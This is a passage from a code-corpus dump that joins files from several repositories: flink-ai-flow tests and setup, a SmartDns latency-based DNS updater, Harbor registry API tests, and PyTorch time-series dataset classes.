event: BaseEvent = BaseEvent(key='key_1',
value='value_1',
namespace='default',
sender='1-job-name',
create_time=round(time.time()*1000))
ts = AiFlowTs()
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.START, action)
event: BaseEvent = BaseEvent(key='key_1',
value='value_1',
namespace='default',
sender='aa',
create_time=round(time.time() * 1000))
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.NONE, action)
event: BaseEvent = BaseEvent(key='key_1_1',
value='value_1',
namespace='default',
sender='1-job-name',
create_time=round(time.time() * 1000))
action, ts = handler.handle_event(event, ts)
self.assertEqual(SchedulingAction.NONE, action)
```
#### File: python_codes/model_validate_component/test_python_model_validate_component.py
```python
import json
import threading
import time
import unittest
from typing import List
from streamz import Stream
from ai_flow import ModelMeta, ExampleSupportType, PythonObjectExecutor, ModelType, ExecutionMode
from ai_flow.application_master.master import AIFlowMaster
from ai_flow.util.path_util import get_file_dir
from ai_flow.model_center.entity.model_version_stage import ModelVersionStage
from ai_flow.udf.function_context import FunctionContext
from python_ai_flow import ExampleExecutor, Executor
from python_ai_flow.test import test_util
import tensorflow as tf
import ai_flow as af
class ReadBatchExample(ExampleExecutor):
def execute(self, function_context: FunctionContext, input_list: List) -> List:
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data(path='mnist.npz')
return [[x_train, y_train, x_test, y_test]]
def get_compiled_model():
model = tf.keras.models.Sequential([
tf.keras.layers.Flatten(input_shape=(28, 28)),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dropout(0.2),
tf.keras.layers.Dense(10, activation='softmax')
])
return model
class TrainBatchMnistModel(Executor):
def execute(self, function_context: FunctionContext, input_list: List) -> List:
model = get_compiled_model()
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy', 'mse'])
x_train, y_train = input_list[0][0] / 255.0, input_list[0][1]
model.fit(x_train, y_train, epochs=1)
model_meta: ModelMeta = function_context.node_spec.output_model
save_path = 'saved_models/{}'.format(round(time.time() * 1000))
model.save(save_path, save_format='tf')
af.register_model_version(model=model_meta,
model_path=save_path)
class BatchModelValidate(Executor):
def __init__(self):
super().__init__()
self.path = None
self.model_version = None
def setup(self, function_context: FunctionContext):
model_name = function_context.node_spec.model.name
notifications = af.list_events(key=model_name)
self.path = json.loads(notifications[0].value).get('_model_path')
self.model_version = json.loads(notifications[0].value).get('_model_version')
def execute(self, function_context: FunctionContext, input_list: List) -> List:
save_path = self.path
new_model_version = self.model_version
model_meta: ModelMeta = function_context.node_spec.model
serving_model_version = af.get_deployed_model_version(model_name=model_meta.name)
if serving_model_version is None:
af.update_model_version(model_name=model_meta.name, model_version=new_model_version,
current_stage=ModelVersionStage.VALIDATED)
print('the first serving model version is ', new_model_version)
else:
x_test, y_test = input_list[0][0], input_list[0][1]
model = tf.keras.models.load_model(save_path)
result = model.evaluate(x_test, y_test, verbose=2)
base_model = tf.keras.models.load_model(serving_model_version.model_path)
result_base = base_model.evaluate(x_test, y_test, verbose=2)
model_validate_result = af.register_artifact(name='model_validate',
batch_uri=get_file_dir(__file__) + '/model_batch_validate')
if function_context.job_context.execution_mode == ExecutionMode.BATCH:
file_uri = model_validate_result.batch_uri
else:
file_uri = model_validate_result.stream_uri
with open(file_uri, 'a') as f:
f.write(str(result_base) + ' -------> ' + 'previous model version: ' + serving_model_version.version)
f.write('\n')
f.write(str(result) + ' -------> ' + 'base model version: ' + new_model_version)
f.write('\n')
if result[1] > result_base[1]:
af.update_model_version(model_name=model_meta.name,
model_version=serving_model_version.version,
current_stage=ModelVersionStage.DEPRECATED)
af.update_model_version(model_name=model_meta.name, model_version=new_model_version,
current_stage=ModelVersionStage.VALIDATED)
print('the serving model version is ', new_model_version)
else:
print('the serving model version is ', serving_model_version.version)
return []
class SourceThread(threading.Thread):
def __init__(self):
super().__init__()
self.stream = Stream()
def run(self) -> None:
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data(path='mnist.npz')
for _ in range(0, 4):
print('The example has been read {} times'.format(_ + 1))
self.stream.emit((x_train, y_train))
time.sleep(1)
class ReadStreamExample(ExampleExecutor):
def setup(self, function_context: FunctionContext):
self.thread = SourceThread()
def execute(self, function_context: FunctionContext, input_list: List) -> List:
self.thread.start()
return [self.thread.stream]
class TrainStreamMnistModel(Executor):
def __init__(self):
super().__init__()
self.path = None
def setup(self, function_context: FunctionContext):
model_name = function_context.node_spec.output_model.name
event_type = 'model_listener'
notifications = af.list_events(key=model_name)
self.path = json.loads(notifications[0].value).get('_model_path')
def execute(self, function_context: FunctionContext, input_list: List) -> List:
def sink(df):
pass
def train(df, model, sess, graph):
x_train, y_train = df[0] / 255.0, df[1]
with graph.as_default():
tf.compat.v1.keras.backend.set_session(sess)
model.fit(x_train, y_train, epochs=1)
model_meta: ModelMeta = function_context.node_spec.output_model
save_path = 'saved_models/{}'.format((round(time.time() * 1000)))
model.save(save_path, save_format='tf')
af.register_model_version(
model_id=model_meta.uuid,
model_path=save_path)
return df
while self.path is None:
pass
load_path = self.path
sess = tf.Session()
graph = tf.get_default_graph()
tf.compat.v1.keras.backend.set_session(sess)
model = tf.keras.models.load_model(load_path)
print('model update!')
data: Stream = input_list[0]
data.map(train, model, sess, graph).sink(sink)
return []
class TestModelValidateComponent(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
config_file = test_util.get_master_config_file()
cls.master = AIFlowMaster(config_file=config_file)
cls.master.start()
test_util.set_project_config(__file__)
@classmethod
def tearDownClass(cls) -> None:
cls.master.stop()
af.unset_project_config()
def tearDown(self):
TestModelValidateComponent.master._clear_db()
def test_batch_model_validate(self):
input_example_meta = af.register_example(name='batch_train_example',
support_type=ExampleSupportType.EXAMPLE_BOTH)
model_meta = af.register_model(model_name='mnist_model',
model_type=ModelType.SAVED_MODEL)
with af.config(af.BaseJobConfig(platform='local', engine='python', job_name='evaluate')):
input_example = af.read_example(example_info=input_example_meta,
executor=PythonObjectExecutor(python_object=ReadBatchExample()))
batch_train = af.train(input_data_list=[input_example],
executor=PythonObjectExecutor(python_object=TrainBatchMnistModel()),
model_info=model_meta)
model_validate = af.model_validate(input_data_list=[input_example],
model_info=model_meta,
executor=PythonObjectExecutor(python_object=BatchModelValidate()),
output_num=0)
af.stop_before_control_dependency(model_validate, batch_train)
workflow_id = af.run(test_util.get_project_path())
res = af.wait_workflow_execution_finished(workflow_id)
self.assertEqual(0, res)
```
#### File: flink-ai-extended/flink-ai-flow/setup-mini.py
```python
from shutil import copytree, rmtree
from setuptools import setup, find_packages
import os
CURRENT_DIR = os.path.abspath(os.path.dirname(__file__))
in_source = os.path.isfile(CURRENT_DIR + "/run_tests.sh")
def remove_if_exists(file_path):
if os.path.exists(file_path):
if os.path.islink(file_path) or os.path.isfile(file_path):
os.remove(file_path)
else:
assert os.path.isdir(file_path)
rmtree(file_path)
try:
if in_source:
AIRFLOW_DIR = CURRENT_DIR + "/lib/airflow"
NOTIFICATION_SERVICE_DIR = CURRENT_DIR + "/lib/notification_service"
try:
os.symlink(AIRFLOW_DIR + "/airflow", CURRENT_DIR + "/airflow")
support_symlinks = True
except BaseException: # pylint: disable=broad-except
support_symlinks = False
if support_symlinks:
os.symlink(NOTIFICATION_SERVICE_DIR + "/notification_service",
CURRENT_DIR + "/notification_service")
else:
copytree(AIRFLOW_DIR + "/airflow", CURRENT_DIR + "/airflow")
copytree(NOTIFICATION_SERVICE_DIR + "/notification_service",
CURRENT_DIR + "/notification_service")
packages = []
for package in find_packages():
if 'airflow' not in package and 'python_ai_flow' not in package and 'flink_ai_flow' not in package:
packages.append(package)
require_file = '{}/{}'.format(os.path.dirname(os.path.abspath(__file__)), "requirements.txt")
with open(require_file) as f:
context = f.read()
require_file_lines = context.strip().split('\n')
required_packages = []
for line in require_file_lines:
if line.startswith("# Optional"):
break
if not len(line.strip()) == 0 and not line.startswith("#"):
required_packages.append(line)
setup(
name='ai_flow',
version='0.3.0',
description='This is an ai flow of the setup',
author='',
author_email='',
url='',
packages=packages,
install_requires=required_packages,
include_package_data=True,
scripts=['ai_flow/bin/start-aiflow.sh',
'ai_flow/bin/stop-aiflow.sh',
'ai_flow/bin/start_aiflow.py',
'ai_flow/bin/start_notification_service.py'],
package_data={
'': ['airflow/alembic.ini', "airflow/git_version", "*.ipynb",
"airflow/providers/cncf/kubernetes/example_dags/*.yaml"],
'airflow.serialization': ["*.json"],
}
)
finally:
if in_source:
remove_if_exists(CURRENT_DIR + "/notification_service")
remove_if_exists(CURRENT_DIR + "/airflow")
```
#### File: tests/python_codes/test_run_jobs_with_dependencies.py
```python
import time
import os
from typing import List
from ai_flow.model_center.entity.model_version_stage import ModelVersionEventType
from ai_flow.udf.function_context import FunctionContext
from python_ai_flow.user_define_funcs import Executor
from notification_service.client import NotificationClient
from notification_service.base_notification import BaseEvent
from airflow.models import DagRun
from airflow.utils.state import State
from airflow.models.taskexecution import TaskExecution
from airflow.utils.session import create_session
from base_ete_test import BaseETETest, workflow_config_file, master_port
import ai_flow as af
import flink_ai_flow as faf
class SimpleExecutor(Executor):
def execute(self, function_context: FunctionContext, input_list: List) -> List:
print("hello world!")
return []
class SendExecutor(Executor):
def __init__(self, sender, key, value, event_type, port):
super().__init__()
self.sender = sender
self.key = key
self.value = value
self.event_type = event_type
self.port = port
def execute(self, function_context: FunctionContext, input_list: List) -> List:
from notification_service.client import NotificationClient
client = NotificationClient(server_uri="localhost:{}".format(self.port),
default_namespace="default", sender=self.sender)
client.send_event(BaseEvent(key=self.key, value=self.value, event_type=self.event_type))
return []
class TestRunAIFlowJobs(BaseETETest):
def test_run_model_version_job(self):
project_name = 'test_project'
workflow_name = 'test_workflow'
dag_id = '{}.{}'.format(project_name, workflow_name)
train_model = af.register_model(model_name='model_1',
model_type=af.ModelType.SAVED_MODEL,
model_desc='test model')
def run_task_function(client: NotificationClient):
with af.global_config_file(workflow_config_file()):
with af.config('task_2'):
executor_1 = af.user_define_operation(af.PythonObjectExecutor(SimpleExecutor()))
with af.config('task_3'):
executor_2 = af.user_define_operation(af.PythonObjectExecutor(SimpleExecutor()))
af.model_version_control_dependency(src=executor_2,
dependency=executor_1,
model_name='model_1',
model_version_event_type=ModelVersionEventType.MODEL_GENERATED)
workflow_info = af.workflow_operation.submit_workflow(workflow_name)
af.workflow_operation.start_new_workflow_execution(workflow_name)
r_flag = True
while True:
with create_session() as session:
tes2 = session.query(TaskExecution).filter(TaskExecution.dag_id == 'test_project.test_workflow',
TaskExecution.task_id == 'task_2').all()
if len(tes2) == 1 and r_flag:
af.register_model_version(model='model_1', model_path='/tmp/model/v1',
current_stage=af.ModelVersionStage.GENERATED)
r_flag = False
dag_run = session.query(DagRun).filter(DagRun.dag_id == 'test_project.test_workflow').first()
if dag_run is not None and dag_run.state in State.finished:
break
else:
time.sleep(1)
self.run_ai_flow(dag_id, run_task_function)
with create_session() as session:
tes = session.query(TaskExecution).filter(TaskExecution.dag_id == 'test_project.test_workflow',
TaskExecution.task_id == 'task_2').all()
self.assertEqual(1, len(tes))
def test_two_jobs(self):
project_name = 'test_project'
workflow_name = 'test_workflow'
dag_id = '{}.{}'.format(project_name, workflow_name)
def run_task_function(client: NotificationClient):
with af.global_config_file(workflow_config_file()):
with af.config('task_2'):
executor_1 = af.user_define_operation(af.PythonObjectExecutor(
SendExecutor(sender='task_2',
key='key_1',
value='value_1',
event_type='UNDEFINED',
port=master_port())
))
with af.config('task_5'):
executor_2 = af.user_define_operation(af.PythonObjectExecutor(SimpleExecutor()))
af.user_define_control_dependency(src=executor_2,
dependency=executor_1,
event_key='key_1',
event_value='value_1')
workflow_info = af.workflow_operation.submit_workflow(workflow_name)
af.workflow_operation.start_new_workflow_execution(workflow_name)
while True:
with create_session() as session:
dag_run = session.query(DagRun).filter(DagRun.dag_id == 'test_project.test_workflow').first()
if dag_run is not None and dag_run.state in State.finished:
break
else:
time.sleep(1)
self.run_ai_flow(dag_id, run_task_function)
with create_session() as session:
tes = session.query(TaskExecution).filter(TaskExecution.dag_id == 'test_project.test_workflow',
TaskExecution.task_id == 'task_2').all()
self.assertEqual(1, len(tes))
tes = session.query(TaskExecution).filter(TaskExecution.dag_id == 'test_project.test_workflow',
TaskExecution.task_id == 'task_5').all()
self.assertEqual(1, len(tes))
def test_two_jobs_2(self):
project_name = 'test_project'
workflow_name = 'test_workflow'
dag_id = '{}.{}'.format(project_name, workflow_name)
def run_task_function(client: NotificationClient):
with af.global_config_file(workflow_config_file()):
with af.config('task_2'):
executor_1 = af.user_define_operation(af.PythonObjectExecutor(SimpleExecutor()))
with af.config('task_5'):
executor_2 = af.user_define_operation(af.PythonObjectExecutor(SimpleExecutor()))
af.user_define_control_dependency(src=executor_2,
dependency=executor_1,
namespace='test',
event_key='key_1',
event_value='value_1',
sender='*')
workflow_info = af.workflow_operation.submit_workflow(workflow_name)
af.workflow_operation.start_new_workflow_execution(workflow_name)
flag = True
while True:
with create_session() as session:
tes = session.query(TaskExecution).filter(TaskExecution.dag_id == 'test_project.test_workflow',
TaskExecution.task_id == 'task_2').all()
if 1 == len(tes) and flag:
client.send_event(BaseEvent(key='key_1', value='value_1'))
flag = False
dag_run = session.query(DagRun).filter(DagRun.dag_id == 'test_project.test_workflow').first()
if dag_run is not None and dag_run.state in State.finished:
break
else:
time.sleep(1)
self.run_ai_flow(dag_id, run_task_function)
with create_session() as session:
tes = session.query(TaskExecution).filter(TaskExecution.dag_id == 'test_project.test_workflow',
TaskExecution.task_id == 'task_2').all()
self.assertEqual(1, len(tes))
tes = session.query(TaskExecution).filter(TaskExecution.dag_id == 'test_project.test_workflow',
TaskExecution.task_id == 'task_5').all()
self.assertEqual(1, len(tes))
def test_three_jobs(self):
project_name = 'test_project'
workflow_name = 'test_workflow'
dag_id = '{}.{}'.format(project_name, workflow_name)
def run_task_function(client: NotificationClient):
with af.global_config_file(workflow_config_file()):
with af.config('task_2'):
executor_1 = af.user_define_operation(af.PythonObjectExecutor(
SendExecutor(sender='task_2',
key='key_1',
value='value_1',
event_type='UNDEFINED',
port=master_port())
))
with af.config('task_5'):
executor_2 = af.user_define_operation(af.PythonObjectExecutor(
SendExecutor(sender='task_5555',
key='key_2',
value='value_2',
event_type='UNDEFINED',
port=master_port())
))
with af.config('task_6'):
executor_3 = af.user_define_operation(af.PythonObjectExecutor(SimpleExecutor()))
af.user_define_control_dependency(src=executor_3,
dependency=executor_1,
event_key='key_1',
event_value='value_1')
af.user_define_control_dependency(src=executor_3,
dependency=executor_2,
event_key='key_2',
event_value='value_2',
sender='*')
workflow_info = af.workflow_operation.submit_workflow(workflow_name)
af.workflow_operation.start_new_workflow_execution(workflow_name)
while True:
with create_session() as session:
dag_run = session.query(DagRun).filter(DagRun.dag_id == 'test_project.test_workflow').first()
if dag_run is not None and dag_run.state in State.finished:
break
else:
time.sleep(1)
self.run_ai_flow(dag_id, run_task_function)
with create_session() as session:
tes = session.query(TaskExecution).filter(TaskExecution.dag_id == 'test_project.test_workflow',
TaskExecution.task_id == 'task_2').all()
self.assertEqual(1, len(tes))
tes = session.query(TaskExecution).filter(TaskExecution.dag_id == 'test_project.test_workflow',
TaskExecution.task_id == 'task_5').all()
self.assertEqual(1, len(tes))
tes = session.query(TaskExecution).filter(TaskExecution.dag_id == 'test_project.test_workflow',
TaskExecution.task_id == 'task_6').all()
self.assertEqual(1, len(tes))
``` |
{
"source": "jinxingxing/SmartDns",
"score": 2
} |
#### File: SmartDns/dnswitcher/__init__.py
```python
__author__ = 'JinXing'
import sys
import time
from config import load_config
from checker import pick_fastest_host, sys_ping, request_url_by_ss
from updater import update_record
from utils import logger
from functools import partial
import logging
def do_main(conf):
check_type = conf.get('check_type', 'shadowsocks')
if check_type == 'shadowsocks':
ss_config = conf['shadowsocks']
ss_checker = partial(request_url_by_ss,
server_port=int(ss_config['server_port']),
password=str(ss_config['password']),
method=str(ss_config['method']),
url=str(ss_config['check_url']),
timeout=int(ss_config.get('timeout', 5)))
checker_func = ss_checker
elif check_type == 'ping':
ping_checker = partial(sys_ping, count=10, psize=512)
checker_func = ping_checker
else:
raise ValueError('unknown check_type: %s' % check_type)
for info in conf.get("domains"):
domain = info["domain"]
hosts = info["hosts"]
logger.info(u"检查域名: %s", domain)
for i in range(3):
fastest_host = pick_fastest_host(hosts, checker_func)
logger.info(u"响应最快的主机: %s", fastest_host)
new_value = update_record(domain, fastest_host)
logger.info(u"新的记录值: %s => %s", domain, new_value)
def main():
conf_file = sys.argv[1]
conf = load_config(conf_file)
if conf.get('debug', False):
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.INFO)
while 1:
try:
do_main(conf)
sleep_minute = conf.get("sleep", 30)
logger.info(u"%d 分钟后执行下一次检查", sleep_minute)
time.sleep(sleep_minute * 60)
except KeyboardInterrupt, _:
sys.exit(0)
except Exception, e:
import traceback
traceback.print_exc()
logger.info(str(e.message))
time.sleep(60)
if __name__ == "__main__":
main()
``` |
{
"source": "JinXingYoung/harbor",
"score": 2
} |
#### File: python/library/scan_all_stop.py
```python
import time
import base
import v2_swagger_client
from v2_swagger_client.rest import ApiException
class StopScanAll(base.Base):
def __init__(self):
super(StopScanAll,self).__init__(api_type="scanall")
def stop_scan_all(self, expect_status_code=202, expect_response_body=None, **kwargs):
try:
_, status_code, _ = self._get_client(**kwargs).stop_scan_all_with_http_info()
except ApiException as e:
if e.status == expect_status_code:
if expect_response_body is not None and e.body.strip() != expect_response_body.strip():
raise Exception(r"Stop scan all response body is not as expected {} actual status is {}.".format(expect_response_body.strip(), e.body.strip()))
else:
return e.reason, e.body
else:
raise Exception(r"Stop scan all result is not as expected {} actual status is {}.".format(expect_status_code, e.status))
base._assert_status_code(expect_status_code, status_code)
```
#### File: apitests/python/test_push_chart_by_helm3.7_chart_cli.py
```python
from __future__ import absolute_import
import unittest
from testutils import ADMIN_CLIENT, suppress_urllib3_warning, harbor_server, files_directory
from testutils import TEARDOWN
from library import base
from library import helm
from library.project import Project
from library.user import User
from library.repository import Repository
from library.artifact import Artifact
class TestProjects(unittest.TestCase):
user_id = None
project_push_chart_id = None
USER_CLIENT = None
project_push_chart_name = None
@suppress_urllib3_warning
def setUp(self):
self.project = Project()
self.user = User()
self.artifact = Artifact()
self.repo = Repository()
self.url = ADMIN_CLIENT["endpoint"]
self.user_push_chart_password = "<PASSWORD>"
self.chart_file_name = "harbor-helm-1.7.3"
self.chart_file_package_name = "harbor-1.7.3.tgz"
self.chart_file_path = files_directory + "harbor-helm-1.7.3.tar.gz"
self.version = "1.7.3"
self.repo_name = "harbor"
@unittest.skipIf(TEARDOWN is False, "Test data won't be erased.")
def tearDown(self):
# 1. Delete repository chart(CA) by user(UA);
self.repo.delete_repository(TestProjects.project_push_chart_name, self.repo_name, **TestProjects.USER_CLIENT)
# 2. Delete project(PA);
self.project.delete_project(TestProjects.project_push_chart_id, **TestProjects.USER_CLIENT)
# 3. Delete user(UA).
self.user.delete_user(TestProjects.user_id, **ADMIN_CLIENT)
def testPushChartByHelmChartCLI(self):
"""
Test case:
Push Chart File By Helm3.7 CLI
Test step and expected result:
1. Create a new user(UA);
2. Create a new project(PA) by user(UA);
3. Push an chart(CA) to Harbor by helm3.7 CLI successfully;
4. List artifacts successfully;
5. Get chart(CA) by reference successfully;
6. Get addition successfully;
7. Delete chart by reference successfully.
Tear down:
1. Delete repository chart(CA) by user(UA);
2. Delete project(PA);
3. Delete user(UA).
"""
# 1. Create a new user(UA);
TestProjects.user_id, user_name = self.user.create_user(user_password=self.user_push_chart_password,
**ADMIN_CLIENT)
TestProjects.USER_CLIENT = dict(endpoint=self.url, username=user_name, password=self.user_push_chart_password)
# 2. Create a new project(PA) by user(UA);
TestProjects.project_push_chart_id, TestProjects.project_push_chart_name = self.project.create_project(
metadata={"public": "false"}, **TestProjects.USER_CLIENT)
# 3 Push an chart(CA) to Harbor by helm3.7 CLI successfully;
command = ["tar", "zxf", self.chart_file_path]
base.run_command(command)
# 3.1 helm3_7_registry_login;
helm.helm3_7_registry_login(ip=harbor_server, user=user_name, password=self.user_push_chart_password)
# 3.2 helm3_7_package;
helm.helm3_7_package(file_path=self.chart_file_name)
# 3.2 helm3_7_push;
helm.helm3_7_push(file_path=self.chart_file_package_name, ip=harbor_server,
project_name=TestProjects.project_push_chart_name)
# 4. List artifacts successfully;
artifacts = self.artifact.list_artifacts(TestProjects.project_push_chart_name, self.repo_name,
**TestProjects.USER_CLIENT)
self.assertEqual(artifacts[0].type, 'CHART')
self.assertEqual(artifacts[0].tags[0].name, self.version)
# 5.1 Get chart(CA) by reference successfully;
artifact = self.artifact.get_reference_info(TestProjects.project_push_chart_name, self.repo_name, self.version,
**TestProjects.USER_CLIENT)
self.assertEqual(artifact.type, 'CHART')
self.assertEqual(artifact.tags[0].name, self.version)
# 6. Get addition successfully;
addition_r = self.artifact.get_addition(TestProjects.project_push_chart_name, self.repo_name, self.version,
"readme.md", **TestProjects.USER_CLIENT)
self.assertIn("Helm Chart for Harbor", addition_r[0])
addition_v = self.artifact.get_addition(TestProjects.project_push_chart_name, self.repo_name, self.version,
"values.yaml", **TestProjects.USER_CLIENT)
self.assertIn("expose", addition_v[0])
# 7. Delete chart by reference successfully.
self.artifact.delete_artifact(TestProjects.project_push_chart_name, self.repo_name, self.version,
**TestProjects.USER_CLIENT)
if __name__ == '__main__':
unittest.main()
```
#### File: apitests/python/test_stop_scan_image_artifact.py
```python
from __future__ import absolute_import
import unittest
import sys
from testutils import harbor_server, suppress_urllib3_warning
from testutils import TEARDOWN
from testutils import ADMIN_CLIENT, BASE_IMAGE, BASE_IMAGE_ABS_PATH_NAME
from library.project import Project
from library.user import User
from library.repository import Repository
from library.repository import push_self_build_image_to_project
from library.artifact import Artifact
from library.scan import Scan
from library.scan_stop import StopScan
class TestStopScan(unittest.TestCase):
@suppress_urllib3_warning
def setUp(self):
self.project= Project()
self.user= User()
self.artifact = Artifact()
self.repo = Repository()
self.scan = Scan()
self.stop_scan = StopScan()
self.url = ADMIN_CLIENT["endpoint"]
self.user_password = "<PASSWORD>"
self.project_id, self.project_name, self.user_id, self.user_name, self.repo_name1 = [None] * 5
self.user_id, self.user_name = self.user.create_user(user_password = <PASSWORD>, **ADMIN_CLIENT)
self.USER_CLIENT = dict(with_signature = True, with_immutable_status = True, endpoint = self.url, username = self.user_name, password = self.user_password, with_scan_overview = True)
#2. Create a new private project(PA) by user(UA);
self.project_id, self.project_name = self.project.create_project(metadata = {"public": "false"}, **ADMIN_CLIENT)
#3. Add user(UA) as a member of project(PA) with project-admin role;
self.project.add_project_members(self.project_id, user_id = self.user_id, **ADMIN_CLIENT)
@unittest.skipIf(TEARDOWN == False, "Test data won't be erased.")
def do_tearDown(self):
#1. Delete repository(RA) by user(UA);
self.repo.delete_repository(self.project_name, self.repo_name1.split('/')[1], **self.USER_CLIENT)
#2. Delete project(PA);
self.project.delete_project(self.project_id, **self.USER_CLIENT)
#3. Delete user(UA);
self.user.delete_user(self.user_id, **ADMIN_CLIENT)
def testStopScanImageArtifact(self):
"""
Test case:
Stop Scan An Image Artifact
Test step and expected result:
1. Create a new user(UA);
2. Create a new private project(PA) by user(UA);
3. Add user(UA) as a member of project(PA) with project-admin role;
4. Get private project of user(UA), user(UA) can see only one private project which is project(PA);
5. Create a new repository(RA) and tag(TA) in project(PA) by user(UA);
6. Send scan image command;
7. Send stop scan image command.
Tear down:
1. Delete repository(RA) by user(UA);
2. Delete project(PA);
3. Delete user(UA);
"""
#4. Get private project of user(UA), user(UA) can see only one private project which is project(PA);
self.project.projects_should_exist(dict(public=False), expected_count = 1,
expected_project_id = self.project_id, **self.USER_CLIENT)
#Note: Please make sure that this Image has never been pulled before by any other cases,
# so it is a not-scanned image right after repository creation.
image = "docker"
src_tag = "1.13"
#5. Create a new repository(RA) and tag(TA) in project(PA) by user(UA);
self.repo_name1, tag = push_self_build_image_to_project(self.project_name, harbor_server, self.user_name, self.user_password, image, src_tag)
#6. Send scan image command;
self.scan.scan_artifact(self.project_name, self.repo_name1.split('/')[1], tag, **self.USER_CLIENT)
#7. Send stop scan image command.
self.stop_scan.stop_scan_artifact(self.project_name, self.repo_name1.split('/')[1], tag, **self.USER_CLIENT)
self.do_tearDown()
if __name__ == '__main__':
suite = unittest.TestSuite(unittest.makeSuite(TestStopScan))
result = unittest.TextTestRunner(sys.stdout, verbosity=2, failfast=True).run(suite)
if not result.wasSuccessful():
raise Exception(r"Stop Scan test failed: {}".format(result))
``` |
{
"source": "Jin-Xi/TS-Forecasting",
"score": 3
} |
#### File: data/datasets/futures.py
```python
import torch
import torch.utils
from torch.utils.data import Dataset, DataLoader
import pandas as pd
from typing import *
from utils.plot_pred_real import plot_pred_and_real
from sklearn.preprocessing import MinMaxScaler, StandardScaler
class futures(Dataset):
def __init__(self, root: str = "../Corn.csv", target_col: str = "volume",
input_len: int = 50, output_len: int = 5, step: int = -1,
data_type: str = "train", split_rate: float = 0.9, is_scale=True):
self.input_len = input_len
self.output_len = output_len
self.is_scale = is_scale
self.raw_data = self.read_data(root, target_col)
train_len = int(len(self.raw_data) * split_rate)
test_len = vali_len = int((1 - split_rate) * len(self.raw_data) * 0.5)
# 初始化一个scaler
self.scaler = StandardScaler()
if is_scale:
self.raw_data = self.scaler.fit_transform(self.raw_data.reshape(-1, 1)).reshape(-1)
if data_type == "train":
self.data = self.raw_data[:train_len]
self.step = 1 if step == -1 else step
if data_type == "test":
self.data = self.raw_data[train_len:train_len+test_len]
self.step = self.output_len if step == -1 else step
if data_type == "vali":
self.data = self.raw_data[train_len+vali_len:train_len+test_len+vali_len]
self.step = self.output_len if step == -1 else step
def read_data(self, root: str, target_col: str):
df = pd.read_csv(root)
data = df[target_col].values
return data
def __getitem__(self, index):
start_index = self.step * index
end_index = start_index + self.input_len + self.output_len
window = self.data[start_index: end_index]
input_data = window[:self.input_len]
output_data = window[self.input_len:]
# if self.is_scale:
# input_data = self.scaler.fit_transform(input_data.reshape(-1, 1)).reshape(-1)
# output_data = self.scaler.fit_transform(output_data.reshape(-1, 1)).reshape(-1)
input_data = torch.tensor(input_data, dtype=torch.float)
output_data = torch.tensor(output_data, dtype=torch.float)
return input_data.float(), output_data.float()
def __len__(self):
return (len(self.data) - self.output_len - self.input_len) // self.step
if __name__ == '__main__':
train_dataset = futures(root='../Corn.csv', input_len=30, output_len=10,
split_rate=0.98, data_type='train')
train_dataloader = DataLoader(train_dataset, batch_size=1, shuffle=True)
vali_dataset = futures(root='../Corn.csv', input_len=20, output_len=10,
split_rate=0.98, data_type='vali')
vali_dataloader = DataLoader(vali_dataset, batch_size=1, shuffle=False)
outputs = []
for input_data, output_data in vali_dataloader:
outputs.append(output_data)
outputs = torch.cat(outputs, dim=1).cpu().detach().numpy().reshape(-1)
vali_loss = plot_pred_and_real(outputs, outputs, 1)
```
#### File: data/datasets/time_series.py
```python
from torch.utils.data import Dataset, DataLoader
from matplotlib import pyplot as plt
import torch
from torch import Tensor
import numpy as np
from sklearn.preprocessing import MinMaxScaler
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
"""
工具函数
"""
def plot_series(time, series, format="-", start=0, end=None):
plt.plot(time[start:end], series[start:end], format)
plt.xlabel("Time")
plt.ylabel("Value")
plt.grid(True)
def trend(time, slope=0.):
return slope * time
def seasonal_pattern(season_time):
"""Just an arbitrary pattern, you can change it if you wish"""
return np.where(season_time < 0.4,
np.cos(season_time * 2 * np.pi),
1 / np.exp(3 * season_time))
def seasonality(time, period, amplitude=1, phase=0):
"""Repeats the same pattern at each period"""
season_time = ((time + phase) % period) / period
return amplitude * seasonal_pattern(season_time)
def noise(time, noise_level=1, seed=None):
rnd = np.random.RandomState(seed)
return rnd.randn(len(time)) * noise_level
"""
数据集定义
"""
class time_series(Dataset):
def __init__(self, input_len=50, pred_len=10, type='train'):
self.window_size = input_len + pred_len
self.pred_len = pred_len
self.type = type
self.input_len = input_len
self.series, self.split_time, self.x_train, self.x_valid, self.time_train, self.time_valid = self.init_data()
if type == 'train':
self.data = self.x_train
self.time = self.time_train
self.step = 1
if type == 'test':
self.data = self.x_valid
self.time = self.time_valid
self.step = self.pred_len
def init_data(self):
time = np.arange(4 * 365 + 1, dtype="float32")
baseline = 10
series = trend(time, 0.1)
baseline = 10
amplitude = 40
slope = 0.05
noise_level = 5
# Create the series
series = baseline + trend(time, slope) + seasonality(time, period=365, amplitude=amplitude)
# Update with noise
series += noise(time, noise_level, seed=42)
split_time = 1000
time_train = time[:split_time]
x_train = series[:split_time]
time_valid = time[split_time:]
x_valid = series[split_time:]
return series, split_time, x_train, x_valid, time_train, time_valid
def __getitem__(self, index):
start = index * self.step
end = start + self.window_size
window = self.data[start:end]
input_tensor = torch.tensor(window[:self.input_len, None])
target_tensor = torch.tensor(window[self.input_len:, None])
return torch.squeeze(input_tensor), torch.squeeze(target_tensor)
def __len__(self):
return (len(self.data) - self.window_size) // self.step
class time_series2(Dataset):
def __init__(self, input_len=50, pred_len=10, type='train'):
self.window_size = input_len + pred_len
self.pred_len = pred_len
self.type = type
self.input_len = input_len
self.scalar = MinMaxScaler(feature_range=(-1, 1))
self.series, self.split_time, self.x_train, self.x_valid, self.time_train, self.time_valid = self.init_data()
if type == 'train':
self.data = self.x_train
self.time = self.time_train
self.step = 1
if type == 'test':
self.data = self.x_valid
self.time = self.time_valid
self.step = self.pred_len
def init_data(self):
time = np.arange(4 * 365 + 1, dtype="float32")
baseline = 10
series = trend(time, 0.1)
baseline = 10
amplitude = 40
slope = 0.05
noise_level = 5
# Create the series
series = baseline + trend(time, slope) + seasonality(time, period=365, amplitude=amplitude)
# Update with noise
series += noise(time, noise_level, seed=42)
# series = self._data_trainform(series)
split_time = 1000
